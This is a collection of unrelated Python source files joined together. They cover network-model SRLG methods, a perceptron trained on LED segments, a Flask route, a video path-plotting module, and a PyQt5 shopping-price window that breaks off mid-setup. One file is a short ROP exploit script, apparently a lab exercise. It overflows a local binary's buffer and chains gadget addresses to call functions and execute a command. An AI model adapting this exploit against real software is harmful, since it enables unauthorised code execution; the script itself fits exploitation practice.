    """
    Extracts interface data from lines and adds Interface objects to a set.
    Also extracts the implied Nodes from the Interfaces and adds those Nodes to a set.

    :param int_info_begin_index: Index position in lines where interface info begins
    :param int_info_end_index: Index position in lines where interface info ends
    :param lines: lines of data describing a Model objects
    :return: set of Interface objects, set of Node objects created from lines
    """
    interface_set = set()
    node_set = set()
    interface_lines = lines[int_info_begin_index:int_info_end_index]

    # PERF FIX: maintain key/name lookup sets incrementally; the original
    # rebuilt a set comprehension over interface_set/node_set for every
    # line, making the loop O(n^2)
    seen_interface_keys = set()
    seen_node_names = set()

    # Add the Interfaces to a set
    for interface_line in interface_lines:
        # Read interface characteristics: 5 mandatory columns, plus
        # optional rsvp_enabled and percent_reservable_bandwidth
        fields = interface_line.split()
        if len(fields) == 5:
            node_name, remote_node_name, name, cost, capacity = fields
            rsvp_enabled_bool = True
            percent_reservable_bandwidth = 100
        elif len(fields) == 6:
            node_name, remote_node_name, name, cost, capacity, rsvp_enabled = fields
            # fields are always strings here; the original also tested the
            # boolean True, which could never match a split() token
            rsvp_enabled_bool = rsvp_enabled in ['T', 'True', 'true']
            percent_reservable_bandwidth = 100
        elif len(fields) == 7:
            (node_name, remote_node_name, name, cost, capacity,
             rsvp_enabled, percent_reservable_bandwidth) = fields
            rsvp_enabled_bool = rsvp_enabled in ['T', 'True', 'true']
        else:
            # ROBUSTNESS FIX: the original claimed to accept >= 7 fields but
            # unpacked exactly 7, raising a bare ValueError on 8+; now any
            # malformed line raises a descriptive ModelException
            msg = ("node_name, remote_node_name, name, cost, and capacity "
                   "must be defined for line {}, line index {}".format(interface_line,
                                                                       lines.index(interface_line)))
            raise ModelException(msg)

        new_interface = Interface(name, int(cost), float(capacity), Node(node_name), Node(remote_node_name),
                                  None, rsvp_enabled_bool, float(percent_reservable_bandwidth))

        if new_interface._key not in seen_interface_keys:
            seen_interface_keys.add(new_interface._key)
            interface_set.add(new_interface)
        else:
            print("{} already exists in model; disregarding line {}".format(new_interface,
                                                                            lines.index(interface_line)))

        # Derive Nodes from the Interface data
        if node_name not in seen_node_names:
            seen_node_names.add(node_name)
            node_set.add(new_interface.node_object)
        if remote_node_name not in seen_node_names:
            seen_node_names.add(remote_node_name)
            node_set.add(new_interface.remote_node_object)

    return interface_set, node_set
def get_demand_objects_source_node(self, source_node_name):
    """
    Returns list of demand objects originating at the source node
    """
    return [demand for demand in self.demand_objects
            if demand.source_node_object.name == source_node_name]
def get_demand_objects_dest_node(self, dest_node_name):
    """Returns list of demands objects terminating at the
    destination node """
    return [demand for demand in self.demand_objects
            if demand.dest_node_object.name == dest_node_name]
# ### SRLG Calls ### #
def get_srlg_object(self, srlg_name, raise_exception=True):
    """
    Returns SRLG in self with srlg_name

    :param srlg_name: name of SRLG
    :param raise_exception: raise an exception if SRLG with name=srlg_name does not
                            exist in self
    :return: matching SRLG object, or None when absent and raise_exception
             is False
    """
    # SRLG names are unique in the model, so at most one can match
    matches = [srlg for srlg in self.srlg_objects if srlg.name == srlg_name]
    if len(matches) == 1:
        return matches[0]
    if raise_exception:
        raise ModelException("No SRLG with name {} exists in Model".format(srlg_name))
    return None
def fail_srlg(self, srlg_name):
    """
    Sets SRLG with name srlg_name to failed = True

    :param srlg_name: name of SRLG to fail
    :return: none
    """
    srlg_to_fail = self.get_srlg_object(srlg_name)

    # Fail every model Node that belongs to the SRLG
    for node in self.node_objects:
        if node in srlg_to_fail.node_objects:
            self.fail_node(node.name)

    # Fail every model Interface that belongs to the SRLG
    for interface in self.interface_objects:
        if interface in srlg_to_fail.interface_objects:
            self.fail_interface(interface.name, interface.node_object.name)

    # Finally flag the SRLG itself as failed
    srlg_to_fail.failed = True
def unfail_srlg(self, srlg_name):
    """
    Sets SRLG with srlg_name to failed = False

    :param srlg_name: name of SRLG to unfail
    :return: none
    """
    srlg_to_unfail = self.get_srlg_object(srlg_name)

    # Flag the SRLG itself as up first
    srlg_to_unfail.failed = False

    # Try to bring each member Node back up. A Node stays failed when it
    # belongs to another SRLG that is still failed; unfail_node raises in
    # that case, so swallow the ModelException and move on.
    for node in self.node_objects:
        if node not in srlg_to_unfail.node_objects:
            continue
        try:
            self.unfail_node(node.name)
        except ModelException:
            pass

    # Same for member Interfaces: an Interface stays failed when another
    # containing SRLG is still failed or an endpoint Node is down;
    # unfail_interface raises in those cases, so ignore the exception.
    for interface in self.interface_objects:
        if interface not in srlg_to_unfail.interface_objects:
            continue
        try:
            self.unfail_interface(interface.name, interface.node_object.name)
        except ModelException:
            pass
def add_srlg(self, srlg_name):
    """
    Adds SRLG object to Model

    :param srlg_name: name of SRLG
    :return: None
    """
    # Guard clause: SRLG names must be unique within the model
    existing_names = {srlg.name for srlg in self.srlg_objects}
    if srlg_name in existing_names:
        raise ModelException("SRLG with name {} already exists in Model".format(srlg_name))
    self.srlg_objects.add(SRLG(srlg_name, self))
def multiple_links_between_nodes(self):
    """
    Ensures there is no more than a single interface facing a
    given remote node (that there are no parallel interfaces
    between nodes)

    :return: a sorted list of the 'local-remote' connection strings that
             appear on more than one interface (one entry per occurrence);
             empty list when there are no parallel interfaces
    """
    from collections import Counter  # stdlib; local import keeps file imports untouched

    connected_nodes_list = [(interface.node_object.name + '-' + interface.remote_node_object.name)
                            for interface in self.interface_objects]

    # PERF FIX: Counter gives O(n) duplicate detection; the original called
    # list.count() per element inside a comprehension, which is O(n^2)
    counts = Counter(connected_nodes_list)
    parallel_links = [connection for connection in connected_nodes_list
                      if counts[connection] > 1]
    parallel_links.sort()
    return parallel_links
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Ported to run under Python 3.7
# modified by xmxoxo for Python 3
import numpy as np
from functools import reduce
# Perceptron class
class Perceptron(object):
    """A single perceptron (threshold unit) with a configurable activation
    function, trained with the classic perceptron learning rule."""

    def __init__(self, input_num, activator):
        """
        Initialize the perceptron.

        :param input_num: number of inputs
        :param activator: activation function, double -> double
        """
        self.activator = activator
        # Weight vector starts at zero
        self.weights = [0.0 for _ in range(input_num)]
        # Bias term starts at zero
        self.bias = 0.0

    # BUG FIX: the original defined methods named `bias` and `weights`,
    # which were shadowed by the instance attributes assigned in __init__
    # (p.bias was the float, so p.bias(b) raised TypeError). Renamed to
    # working setters; nothing could have called the broken originals.
    def set_bias(self, b):
        """Set the bias term."""
        self.bias = b

    def set_weights(self, w):
        """Set the weight vector."""
        self.weights = w

    def __str__(self):
        """
        Render the learned weights and bias.
        """
        return 'weights\t:%s bias\t:%f\n' % (list(self.weights), self.bias)

    def getparm(self):
        """Return all perceptron parameters as (weights, bias)."""
        return (list(self.weights), self.bias)

    def predict(self, input_vec):
        """
        Compute the perceptron output for an input vector.
        """
        # Dot product of inputs and weights, plus bias, through the activator
        weighted_sum = sum(x * w for x, w in zip(input_vec, self.weights))
        return self.activator(weighted_sum + self.bias)

    def train(self, input_vecs, labels, iteration, rate):
        """
        Train on a dataset.

        :param input_vecs: list of input vectors
        :param labels: expected output for each input vector
        :param iteration: number of training epochs
        :param rate: learning rate
        """
        for _ in range(iteration):
            self._one_iteration(input_vecs, labels, rate)

    def _one_iteration(self, input_vecs, labels, rate):
        """
        One epoch: run every (input_vec, label) sample through the update rule.
        """
        for input_vec, label in zip(input_vecs, labels):
            output = self.predict(input_vec)
            self._update_weights(input_vec, output, label, rate)

    def _update_weights(self, input_vec, output, label, rate):
        """
        Perceptron rule: w_i += rate * (label - output) * x_i;
        bias += rate * (label - output).
        """
        delta = label - output
        self.weights = [w + rate * delta * x
                        for x, w in zip(input_vec, self.weights)]
        self.bias += rate * delta
def f(x):
    """Step activation function: 1 for positive input, else 0."""
    if x > 0:
        return 1
    return 0
# Build the training dataset: LED 7-segment digit codes
def get_training_dataset(index=0):
    """Return (input_vecs, labels) for LED segment `index` (0..6 = a..g).

    Out-of-range indexes fall back to segment 0. Inputs are the 16
    four-bit binary codes 0000..1111; labels give the on/off state of the
    chosen segment for each hex digit.
    """
    if not (0 <= index <= 6):
        index = 0

    # All 16 four-bit input patterns, [b3, b2, b1, b0] for n = 0..15
    input_vecs = [[(n >> 3) & 1, (n >> 2) & 1, (n >> 1) & 1, n & 1]
                  for n in range(16)]

    # One label row per LED segment (a..g), one column per hex digit
    lst_labels = [
        [1,0,1,1,0,1,1,1,1,1,1,0,1,0,1,1],
        [1,1,1,1,1,0,0,1,1,1,1,0,0,1,0,0],
        [1,1,0,0,1,1,1,1,1,1,1,1,0,1,0,0],
        [1,0,1,1,0,1,1,0,1,1,0,1,1,1,1,0],
        [1,0,1,1,0,0,1,0,1,0,1,1,1,1,1,1],
        [1,0,0,0,1,1,1,0,1,1,1,1,1,0,1,1],
        [0,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1],
    ]
    return input_vecs, lst_labels[index]
def train_perceptron(index=0):
    """Build a 4-input perceptron with activation f and train it on the
    truth table for LED segment `index` (15 epochs, learning rate 0.1).

    :return: the trained Perceptron
    """
    input_vecs, labels = get_training_dataset(index)
    trained = Perceptron(4, f)
    trained.train(input_vecs, labels, 15, 0.1)
    return trained
# Evaluate a trained perceptron against its truth table.
def test_table(obj, index):
    """Print `obj`'s predictions for segment `index`'s truth table plus accuracy.

    :param obj: a trained perceptron exposing predict(input_vec)
    :param index: LED segment index (0..6)
    """
    # Removed a stray leading `pass` and a dead commented-out print loop.
    print('测试结果'.center(30, '-'))
    input_vecs, labels = get_training_dataset(index)
    predict = [obj.predict(item) for item in input_vecs]
    # 1 where prediction matches the label, 0 otherwise.
    acc = [int(x == y) for x, y in zip(labels, predict)]
    print(labels)
    print(predict)
    print(acc)
    print('准确率: %2.2f' % (sum(acc) / len(acc)))
## Train one perceptron per LED segment (a..g).
def transLED():
    """Train a perceptron for each of the 7 LED segments and report results.

    NOTE(review): the `break` after the first iteration plus the early
    `return 0` leave everything past the loop unreachable — this looks like
    leftover debugging state ("train just one first"); confirm before relying
    on the summary printout below.
    """
    pass
    # Collect trained parameters here.
    lstModel = []
    strSeg = "abcdefg"
    for i in range(len(strSeg)):
        print ('--------正在训练%s感知器--------' % strSeg[i])
        # Train the perceptron for segment i.
        perception = train_perceptron(i)
        # Print the learned weights.
        print (str(perception))
        # Save its parameters into the model list.
        lstModel.append(perception.getparm())
        # Evaluate on the truth table.
        test_table(perception,i)
        break  # train only the first segment for now
    return 0
    # Unreachable: intended summary of all trained perceptrons.
    print("--------模型训练完成,各感知器参数如下:--------")
    for i in range(len(lstModel)):
        print("%s 感知器参数: %s" % (strSeg[i], str(lstModel[i]) ))
## Convert a 7-bit segment pattern into an ASCII LED rendering.
def showLED(dat):
    """Render a 7-segment pattern as a 5-line ASCII picture.

    :param dat: either a string like '1111110' or a list of 7 ints,
        ordered a..g (segments 0, 3, 6 are the horizontal bars)
    :return: the multi-line ASCII string
    """
    bits = [int(ch) for ch in dat] if type(dat) == str else dat
    glyphs = []
    for pos, bit in enumerate(bits):
        mark = '-' if pos in (0, 3, 6) else '|'
        glyphs.append(mark if bit else ' ')
    return ' %s \n%s %s\n %s \n%s %s\n %s ' % (
        glyphs[0], glyphs[5], glyphs[1], glyphs[6],
        glyphs[4], glyphs[2], glyphs[3])
# Print the LED rendering of every hex digit.
def testAllchar():
    """Print the ASCII LED art for the 16 hex characters 0-F."""
    print('测试LED字符输出:')
    sTxt = '0123456789AbCdEF'
    # Segment codes per character (a..g, MSB first).
    # NOTE(review): entries 2 and 3 are identical ("1101101") — '3' is
    # normally "1111001"; confirm against the intended encoding.
    code = ["1111110", "0110000", "1101101", "1101101",
            "0110011", "1011011", "1011111", "1110000",
            "1111111", "1111011", "1110111", "0011111",
            "1001110", "0111101", "1001111", "1000111"]
    for ch, pattern in zip(sTxt, code):
        print('-' * 30)
        print(ch, pattern)
        print(showLED(pattern))
if __name__ == '__main__':
    # Demo entry point: render all 16 hex digits as ASCII LED art.
    testAllchar()
    #transLED()
    #python perceptronLED.py>log.txt
|
# Copyright 2020, Alex Badics, All Rights Reserved
from flask import Blueprint, render_template
from ajdb.database import Database
from hun_law.utils import Date
_blueprint = Blueprint('index', __name__)
@_blueprint.route('/')
def index() -> str:
    """Render the landing page with the act set effective today."""
    act_set = Database.load_act_set(Date.today())
    return render_template('index.html', act_set=act_set)
# Public handle to this module's blueprint, registered by the application.
INDEX_BLUEPRINT = _blueprint
|
import os
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
# import cv2
# POS_MSEC = cv2.CAP_PROP_POS_MSEC
# POS_FRAMES = cv2.CAP_PROP_POS_FRAMES
class FakeDisplay:
    """No-op stand-in mirroring Display's drawing interface.

    Every method accepts the same arguments as the corresponding Display
    method and does nothing — useful when no video/GUI backend is wanted.
    """
    def __init__(self, datadir):
        pass
    def grab_frame(self, frame_id):
        pass
    def plot_path(self, path, pid=-1, args=''):
        pass
    def plot_ped(self, pos=(0, 0), pid=-1, color=(0, 0, 192)):
        pass
    def show(self, title='frame'):
        pass
    def add_orig_frame(self, alpha=0.5):
        pass
class Display:
    """Video-backed visualizer for pedestrian paths (ETH/UCY-style datasets).

    NOTE(review): this class calls cv2 and the POS_FRAMES constant, but the
    `import cv2` at the top of this module is commented out — as written,
    constructing a Display raises NameError. Confirm the import state.
    """
    def __init__(self, datadir):
        # Dataset files: homography, obstacle map, annotations, destinations.
        Hfile = os.path.join(datadir, "H.txt")
        mapfile = os.path.join(datadir, "map.png")
        obsfile = os.path.join(datadir, "obsmat.txt")
        destfile = os.path.join(datadir, "destinations.txt")
        self.cap = cv2.VideoCapture(os.path.join(datadir, 'zara01.avi'))
        self.H = np.loadtxt(Hfile)
        # Inverse homography maps world coordinates to image coordinates.
        self.Hinv = np.linalg.inv(self.H)
        self.scale = 1
        # Fold the display scale into Hinv: S * Hinv * S^-1.
        S = np.eye(3, 3)
        S[0, 0] = self.scale
        S[1, 1] = self.scale
        self.Hinv = np.matmul(np.matmul(S, self.Hinv), np.linalg.inv(S))
        # frames, timeframes, timesteps, agents = parse_annotations(self.Hinv, obsfile)
        # self.obs_map = create_obstacle_map(mapfile)
        destinations = np.loadtxt(destfile)
        plt.ion()
        plot_prediction_metrics([], [], [])
        # Interactive display state / drawing toggles.
        self.agent_num = 1
        self.sample_num = 0
        self.last_t = -1
        self.do_predictions = True
        self.draw_all_agents = False
        self.draw_all_samples = True
        self.draw_truth = True
        self.draw_past = True
        self.draw_plan = True
        self.output = []       # current frame being drawn on
        self.orig_frame = []   # untouched copy of the grabbed frame
    def set_frame(self, frame):
        # Seek the capture to the given 0-based frame index.
        self.cap.set(POS_FRAMES, frame)
    def back_one_frame(self):
        # Step back one frame (current position already points at the next one).
        frame_num = int(self.cap.get(POS_FRAMES))
        self.set_frame(frame_num - 2)
    def reset_frame(self):
        # Re-read the current frame.
        frame_num = int(self.cap.get(POS_FRAMES))
        self.set_frame(frame_num - 1)
    def next_sample(self):
        self.change_sample(lambda x: x + 1)
    def prev_sample(self):
        self.change_sample(lambda x: x - 1)
    def change_sample(self, fn):
        # Stub: apply fn to the sample index (not implemented).
        pass
    def do_frame(self, agent=-1, past_plan=None, with_scores=True, multi_prediction=False):
        # Stub: per-frame drawing/prediction driver (not implemented).
        pass
    def grab_frame(self, frame_id):
        """Seek to frame_id, read and scale it; return the capture's success flag."""
        if self.cap.isOpened():
            self.set_frame(frame_id)
            ret, self.output = self.cap.read()
            self.output = cv2.resize(self.output, (0, 0), fx=self.scale, fy=self.scale, interpolation=cv2.INTER_LINEAR)
            self.orig_frame = self.output.copy()
            return ret
        return False
    def plot_ped(self, pos=(0, 0), pid=-1, color=(0, 0, 192)):
        """Draw a circle at world position `pos`; annotate with pid when >= 0."""
        pix_loc = to_pixels(self.Hinv, np.array([pos[0], pos[1], 1.]))
        cv2.circle(self.output, pix_loc, 5, color, 1, cv2.LINE_AA)
        if pid >= 0:
            cv2.putText(self.output, '%d' % pid, pix_loc, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 0.5, (0,0,200), 2)
    def plot_path(self, path, pid=-1, args=''):
        """Draw a world-coordinate path; `args` selects color (b/g/r/m/y)
        and style ('--' connected lines, '.' small dots, else circles)."""
        color = (255, 255, 255)
        if args.startswith('b'):
            color = (255, 0, 0)
        elif args.startswith('g'):
            color = (0, 255, 0)
        elif args.startswith('r'):
            color = (0, 0, 255)
        elif args.startswith('m'):
            color = (255, 0, 255)
        elif args.startswith('y'):
            color = (0, 255, 255)
        for i in range(len(path)):
            pos_i = path[i, 0:2]
            pix_loc = to_pixels(self.Hinv, np.array([pos_i[0], pos_i[1], 1.]))
            if '--' in args:
                # Connected polyline: draw a segment from the previous point.
                if i != 0:
                    cv2.line(self.output, last_loc, pix_loc, color, 1, cv2.LINE_AA)
                last_loc = pix_loc
            elif '.' in args:
                cv2.circle(self.output, pix_loc, 3, color, -1, cv2.LINE_AA)
            else:
                #elif 'o' in args:
                cv2.circle(self.output, pix_loc, 5, color, 1, cv2.LINE_AA)
            # if pid >= 0 and i == 0:
            # cv2.putText(self.output, '%d' % pid, pix_loc, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 1, (0, 0, 200), 2)
    def add_orig_frame(self, alpha=0.5):
        # Blend the original frame back over the annotated output.
        self.output = cv2.addWeighted(self.orig_frame, alpha, self.output, 1-alpha, 0)
    def show(self, title='frame'):
        """Show the current output in a window; blocks until 'q' is pressed."""
        # plt.imshow(self.output)
        # plt.show()
        cv2.imshow(title, self.output)
        cv2.namedWindow(title, cv2.WINDOW_KEEPRATIO)
        while True:
            if cv2.waitKey(1) & 0xFF == ord('q'):
                cv2.destroyAllWindows()
                break
def plot_prediction_metrics(prediction_errors, path_errors, agents):
    """Redraw figure 1 with prediction-error (top) and path-error (bottom)
    subplots; with no prediction errors only the figure is cleared."""
    plt.figure(1, (10, 10))
    plt.clf()
    # len() (not truthiness) so numpy arrays are handled the same way.
    if len(prediction_errors) > 0:
        for row, (caption, series) in enumerate(
                [('Prediction Error', prediction_errors),
                 ('Path Error', path_errors)], start=1):
            plt.subplot(2, 1, row)
            plot_prediction_error(caption, series, agents)
    plt.draw()
def plot_prediction_error(title, errors, agents):
    """Plot one error curve per agent plus their NaN-aware mean (dashed black)."""
    plt.title(title)
    plt.xlabel('Time (frames)')
    plt.ylabel('Error (px)')
    mean_curve = np.nanmean(errors, 1)
    agent_lines = plt.plot(errors)
    mean_line = plt.plot(mean_curve, 'k--', lw=4)
    legend_labels = ['{}'.format(a) for a in agents] + ['mean']
    plt.legend(agent_lines + mean_line, legend_labels)
def plot_nav_metrics(ped_scores, IGP_scores):
    """Scatter IGP vs. pedestrian scores: path length (left subplot, column 0)
    and minimum safety (right subplot, column 1), each with a y=x reference."""
    plt.clf()
    if len(ped_scores) > 0:
        for column, caption in ((0, 'Path Length (px)'),
                                (1, 'Minimum Safety (px)')):
            plt.subplot(1, 2, column + 1)
            plt.title(caption)
            plt.xlabel('IGP')
            plt.ylabel('Pedestrian')
            plt.scatter(IGP_scores[:, column], ped_scores[:, column])
            plot_diag()
    plt.draw()
def plot_diag():
    """Draw the y=x reference line and force both axes onto the same limits."""
    x_lo, x_hi = plt.xlim()
    y_lo, y_hi = plt.ylim()
    shared = (min(0, min(x_lo, y_lo)), max(x_hi, y_hi))
    plt.plot((0, 1000), (0, 1000), 'k')
    plt.xlim(shared)
    plt.ylim(shared)
def draw_text(frame, pt, frame_txt):
    """Draw `frame_txt` above `pt` on a filled black background box.

    :param frame: image to draw on (modified in place)
    :param pt: (x, y) lower-left anchor of the box
    :param frame_txt: text to render
    :return: (lower_left, upper_right) corners of the background box
    """
    font = cv2.FONT_HERSHEY_SIMPLEX
    scale = 0.6
    thickness = 1
    (text_w, text_h), baseline = cv2.getTextSize(frame_txt, font, scale, thickness)
    baseline += thickness
    lower_left = (pt[0], pt[1])
    anchor = (pt[0], pt[1] - baseline)          # text baseline origin
    upper_right = (anchor[0] + text_w, anchor[1] - text_h - 2)
    cv2.rectangle(frame, lower_left, upper_right, (0, 0, 0), -1, cv2.LINE_AA)
    cv2.putText(frame, frame_txt, anchor, font, scale, (0, 255, 0), thickness, cv2.LINE_AA)
    return lower_left, upper_right
def crossline(curr, prev, length):
    """Endpoints of a tick mark of `length` centered at `curr`, perpendicular
    to the segment prev -> curr.

    :param curr: current point as an array-like (axis0, axis1)
    :param prev: previous point, same layout
    :return: two (int, int) pairs in (axis1, axis0) order, truncated toward 0
    """
    delta = curr - prev
    if delta[1] == 0:
        # Motion purely along axis 1: the perpendicular is axis-0 aligned.
        half = length / 2
        return ((int(curr[1]), int(curr[0] - half)),
                (int(curr[1]), int(curr[0] + half)))
    slope = -delta[0] / delta[1]
    dx = np.cos(np.arctan(slope)) * length / 2
    dy = slope * dx
    first = (int(curr[1] - dy), int(curr[0] - dx))
    second = (int(curr[1] + dy), int(curr[0] + dx))
    return first, second
def draw_path(frame, path, color):
    """Draw `path` (rows of (x, y, ...)) on `frame` as connected segments,
    with a small perpendicular tick at each point after the first."""
    if path.shape[0] > 0:
        prev = path[0]
        for curr in path[1:]:
            # cv2 takes points in (column, row) = (y, x) order here.
            loc1 = (int(prev[1]), int(prev[0])) # (y, x)
            loc2 = (int(curr[1]), int(curr[0])) # (y, x)
            p1, p2 = crossline(curr, prev, 3)
            cv2.line(frame, p1, p2, color, 1, cv2.LINE_AA)
            cv2.line(frame, loc1, loc2, color, 1, cv2.LINE_AA)
            prev = curr
def draw_waypoints(frame, points, color):
    """Draw each (x, y, z) waypoint as a filled circle (cv2 (y, x) order)."""
    for loc in ((int(y), int(x)) for x, y, z in points):
        cv2.circle(frame, loc, 3, color, -1, cv2.LINE_AA)
def create_obstacle_map(map_png):
    """Load the obstacle-map PNG into a numpy array.

    NOTE(review): an identical definition appears again later in this module
    and overrides this one — remove one of the two.
    """
    raw_map = np.array(Image.open(map_png))
    return raw_map
# ignored_peds = [171, 216]
# Ped IDs excluded by parse_annotations; empty means keep everyone.
ignored_peds = []
def to_pixels(Hinv, loc):
    """
    Given H^-1 and (x, y, z) in world coordinates, returns (c, r) in image
    pixel indices.
    """
    projected = to_image_frame(Hinv, loc).astype(int)
    # Swap to (column, row) order for cv2 drawing calls.
    return projected[1], projected[0]
def to_image_frame(Hinv, loc):
    """
    Given H^-1 and (x, y, z) in world coordinates, returns (u, v, 1) in image
    frame coordinates. Accepts a single point (1-D) or an (N, 3) batch.
    """
    if loc.ndim == 1:
        cam = np.dot(Hinv, loc)          # to camera frame
        return cam / cam[2]              # homogeneous normalization
    # Batch: project all rows at once, then normalize by the z row.
    cam = np.matmul(Hinv, np.transpose(loc))
    return np.transpose(cam / cam[2])
def create_obstacle_map(map_png):
    """Load the obstacle-map PNG into a numpy array.

    NOTE(review): duplicate of the earlier definition in this module; this
    later one wins at import time.
    """
    raw_map = np.array(Image.open(map_png))
    return raw_map
def parse_annotations(Hinv, obsmat_txt):
    """Parse an obsmat-style annotation matrix (columns: frame, ped id, x, _, y, ...).

    Returns (frames, timeframes, timesteps, peds):
      frames[f]     -> timestep index observed at frame f (-1 if none)
      timeframes[t] -> first frame number of timestep t
      timesteps[t]  -> ped IDs present at timestep t
      peds[pid]     -> (n, 4) array of [t, x, y, 1] rows

    NOTE(review): indentation reconstructed — the loc/peds updates are assumed
    to be inside the ignored-ped guard; confirm against the original file.
    """
    mat = np.loadtxt(obsmat_txt)
    num_frames = int(mat[-1, 0] + 1)
    num_times = np.unique(mat[:, 0]).size
    num_peds = int(np.max(mat[:, 1])) + 1
    frames = [-1] * num_frames # maps frame -> timestep
    timeframes = [-1] * num_times # maps timestep -> (first) frame
    timesteps = [[] for _ in range(num_times)] # maps timestep -> ped IDs
    peds = [np.array([]).reshape(0, 4) for _ in range(num_peds)] # maps ped ID -> (t,x,y,z) path
    frame = 0
    time = -1
    for row in mat:
        # A new frame id opens the next timestep bucket.
        if row[0] != frame:
            frame = int(row[0])
            time += 1
            frames[frame] = time
            timeframes[time] = frame
        ped = int(row[1])
        if ped not in ignored_peds: # TEMP HACK - can cause empty timesteps
            timesteps[time].append(ped)
            loc = np.array([row[2], row[4], 1])
            # loc = util.to_image_frame(Hinv, loc)
            loc = [time, loc[0], loc[1], loc[2]] # loc[0], loc[1] should be img coords, loc[2] always "1"
            peds[ped] = np.vstack((peds[ped], loc))
    return frames, timeframes, timesteps, peds
def main():
    """Manual smoke test: construct a Display and plot a default pedestrian.

    NOTE(review): Display requires cv2, whose import is commented out at the
    top of this module, so this raises NameError as-is.
    """
    disp = Display('/home/jamirian/workspace/crowd_sim/tests/eth')
    disp.plot_ped()
    # ============== SET FRAME ==================
    time_length = 30.0
    fps = 25
    frame_seq = 749
    # Fraction of the clip (0.0-1.0); computed but currently unused.
    frame_no = (frame_seq / (time_length * fps))
    # The first argument of cap.set(), number 2 defines that parameter for setting the frame selection.
    # Number 2 defines flag CV_CAP_PROP_POS_FRAMES which is a 0-based index of the frame to be decoded/captured next.
    # The second argument defines the frame number in range 0.0-1.0
|
#!/usr/bin/python2
import os
import struct # This module performs conversions between Python
# values and C structs represented as Python strings.
# It uses Format Strings as compact descriptions of the layout
# of the C structs and the intended conversion to/from Python values.
# Gadgets found with Ropper
# Gadgets found with Ropper
pop_ret = 0x0804848e
pop_pop_ret = 0x0804848d
# Addresses of functions found using gdb.
add_bin = 0x8048454
add_sh = 0x8048490
exec_command = 0x804843b
# 0x6c filler bytes up to the saved frame pointer, then 4 bytes clobbering it.
payload = "A"*0x6c
payload += "BBBB"
# "I" is the format for unsigned integer
# ROP chain (appears to be): add_bin(0xdeadbeef) -> add_sh(0xcafebabe,
# 0x8badf00d) -> exec_command(), with pop_ret / pop_pop_ret removing the
# arguments from the stack between calls.
payload += struct.pack("I", add_bin)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
payload += struct.pack("I", add_sh)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xcafebabe)
payload += struct.pack("I", 0x8badf00d)
payload += struct.pack("I", exec_command)
# Python 2 only: concatenating str with struct.pack output breaks on Python 3
# (bytes vs str), matching the #!/usr/bin/python2 shebang above.
os.system("./chaining_func \"%s\"" % payload)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'untitled.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
from MakeData import MakeData
class Ui_MainWindow(object):
    """Qt-Designer-generated price-comparison window (see header warning:
    edits here are overwritten on regeneration).

    Three store columns (Shufersal / storage market / Rami Levi), each with a
    product combo box, an Add button, an item list label, and a total label.
    """
    def setupUi(self, MainWindow):
        """Build all widgets, wire signals, and populate the combo boxes."""
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(800, 600)
        # Full product objects available per store.
        self.shuf = []
        self.market = []
        self.ramilevi = []
        # Products the user has added to each basket.
        self.product_shufersal = [] # for the items
        self.product_market = [] # for the items
        self.product_ramilevi = []
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        # Product pickers, one per store column.
        self.comboBox1 = QtWidgets.QComboBox(self.centralwidget)
        self.comboBox1.setGeometry(QtCore.QRect(518, 81, 191, 21))
        self.comboBox1.setObjectName("comboBox1")
        self.comboBox_2 = QtWidgets.QComboBox(self.centralwidget)
        self.comboBox_2.setGeometry(QtCore.QRect(248, 82, 191, 20))
        self.comboBox_2.setObjectName("comboBox_2")
        self.comboBox_3 = QtWidgets.QComboBox(self.centralwidget)
        self.comboBox_3.setGeometry(QtCore.QRect(10, 80, 181, 21))
        self.comboBox_3.setObjectName("comboBox_3")
        self.calcbtn = QtWidgets.QPushButton(self.centralwidget)
        self.calcbtn.setGeometry(QtCore.QRect(320, 510, 141, 41))
        self.calcbtn.setObjectName("calcbtn")
        self.add1 = QtWidgets.QPushButton(self.centralwidget)
        self.add1.setGeometry(QtCore.QRect(720, 80, 31, 23))
        # NOTE(review): object name "add2_2" does not match attribute add1 —
        # generator leftover, harmless but confusing.
        self.add1.setObjectName("add2_2")
        self.add3 = QtWidgets.QPushButton(self.centralwidget)
        self.add3.setGeometry(QtCore.QRect(200, 80, 31, 23))
        self.add3.setObjectName("add3")
        self.add2 = QtWidgets.QPushButton(self.centralwidget)
        self.add2.setGeometry(QtCore.QRect(450, 80, 31, 23))
        self.add2.setObjectName("add2")
        # Item-list labels, one per store column.
        self.label_1 = QtWidgets.QLabel(self.centralwidget)
        self.label_1.setGeometry(QtCore.QRect(590, 110, 201, 331))
        self.label_1.setObjectName("label_1")
        self.label_2 = QtWidgets.QLabel(self.centralwidget)
        self.label_2.setGeometry(QtCore.QRect(300, 120, 201, 311))
        self.label_2.setObjectName("label_2")
        self.label_3 = QtWidgets.QLabel(self.centralwidget)
        self.label_3.setGeometry(QtCore.QRect(30, 120, 201, 321))
        self.label_3.setObjectName("label_3")
        self.label = QtWidgets.QLabel(self.centralwidget)
        self.label.setGeometry(QtCore.QRect(260, 10, 371, 51))
        # Clear the placeholder "TextLabel" content.
        self.label_1.clear()
        self.label_2.clear()
        self.label_3.clear()
        font = QtGui.QFont()
        font.setPointSize(18)
        font.setBold(True)
        font.setWeight(75)
        self.label.setFont(font)
        self.label.setObjectName("label")
        # Per-store total labels.
        self.price1 = QtWidgets.QLabel(self.centralwidget)
        self.price1.setGeometry(QtCore.QRect(580, 460, 171, 41))
        self.price1.setObjectName("price1")
        self.price2 = QtWidgets.QLabel(self.centralwidget)
        self.price2.setGeometry(QtCore.QRect(300, 460, 171, 41))
        self.price2.setObjectName("price2")
        self.price3 = QtWidgets.QLabel(self.centralwidget)
        self.price3.setGeometry(QtCore.QRect(20, 460, 171, 41))
        self.price3.setObjectName("price3")
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
